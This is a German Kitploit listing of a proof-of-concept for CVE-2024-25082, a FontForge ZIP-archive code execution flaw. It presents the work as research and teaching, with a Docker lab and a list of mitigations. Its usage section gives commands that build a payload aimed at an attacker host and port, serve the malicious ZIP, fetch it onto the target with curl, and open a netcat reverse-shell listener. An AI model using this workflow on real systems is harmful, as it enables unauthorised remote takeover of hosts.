Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-25082 — Proof-of-concept-Exploit für CVE-2024-25082, der Remote-Code-Ausführung in FontForge mittels präparierter ZIP-Archive demonstriert. Enthält Payload-Generator, Docker-Labor und technische Dokumentation für Sicherheitsforschung und -bildung. | Kitploit
Tools/GitHubGitHub/moamenx8/cve-2024-25082
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

Proof-of-concept-Exploit für CVE-2024-25082, der Remote-Code-Ausführung in FontForge mittels präparierter ZIP-Archive demonstriert. Enthält Payload-Generator, Docker-Labor und technische Dokumentation für Sicherheitsforschung und -bildung.

Repository anzeigen
5vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

⚠️ CVE-2024-25082 - FontForge ZIP Remote Code Execution (PoC)

License Python CVE

Proof-of-Concept-Exploit für CVE-2024-25082, eine Schwachstelle, die FontForge betrifft und Remote Code Execution (RCE) durch eine präparierte ZIP-Datei ermöglicht.

Dieses Repository zeigt, wie die Schwachstelle in einer kontrollierten Laborumgebung für Sicherheitsforschung und Bildungszwecke ausgenutzt werden kann.


Schwachstellenübersicht

  • CVE-ID: CVE-2024-25082\
  • Betroffene Software: FontForge\
  • Schwachstellentyp: Remote Code Execution\
  • Angriffsvektor: Bösartiges ZIP-Archiv\
  • Auswirkung: Ausführung beliebiger Befehle, wenn das präparierte Archiv verarbeitet wird.

Die Schwachstelle tritt aufgrund einer fehlerhaften Validierung von Dateien in ZIP-Archiven auf, sodass ein Angreifer beliebige Befehle auf dem Zielsystem ausführen kann.


Repository-Struktur

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

Datei Beschreibung


exploit.py Generiert die bösartige ZIP-Nutzlast poc/ Enthält generierte Proof-of-Concept-Dateien writeup.md Technische Erklärung der Schwachstelle


Voraussetzungen

  • Python 3.x
  • Netcat

Optionale Tools installieren:

root@kitploit:~
sudo apt install netcat

Verwendung

1️⃣ Bösartige Nutzlast generieren

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

Dadurch wird eine bösartige exploit.zip-Datei erstellt.


2️⃣ Exploit bereitstellen

root@kitploit:~
python3 -m http.server 8080

3️⃣ Vom Zielsystem hochladen

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ Reverse-Shell abfangen

root@kitploit:~
nc -lvnp <Your Port>

Bei Erfolg sollte eine Shell auf dem Zielsystem erlangt werden.


Reproduzieren der Schwachstelle

Eine reproduzierbare verwundbare Umgebung wird im Verzeichnis docker/ bereitgestellt.

Beispiel:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

Dies ermöglicht sicheres Testen ohne Beeinträchtigung von Produktionssystemen.


Sicherheitsauswirkungen

Ein Angreifer, der ZIP-Dateien hochladen oder kontrollieren kann, die von der verwundbaren Anwendung verarbeitet werden, kann:

  • Beliebige Systembefehle ausführen
  • Remote-Shell-Zugriff erlangen
  • Das Hostsystem kompromittieren

Gegenmaßnahmen

Empfohlene Schritte zur Eindämmung:

  • Aktualisieren Sie FontForge auf eine gepatchte Version
  • Validieren Sie hochgeladene Archivinhalte
  • Schränken Sie die Datei-Upload-Funktionalität ein
  • Verwenden Sie Sandboxing bei der Verarbeitung von Schriftarten

Haftungsausschluss

Dieses Repository enthält Proof-of-Concept-Code für eine öffentlich bekannt gewordene Schwachstelle.

Der Code wird ausschließlich bereitgestellt für:

  • Sicherheitsforschung
  • Bildungszwecke
  • Autorisierte Penetrationstests

Verwenden Sie diesen Code NICHT gegen Systeme ohne ausdrückliche Erlaubnis.

Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch diese Software verursacht werden.


Autor

Moamen Elmaghrabi

Cybersecurity-Student
Penetrationstests & Exploit-Entwicklung


Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.
Weitere Informationen finden Sie in der LICENSE-Datei.

Tool herunterladen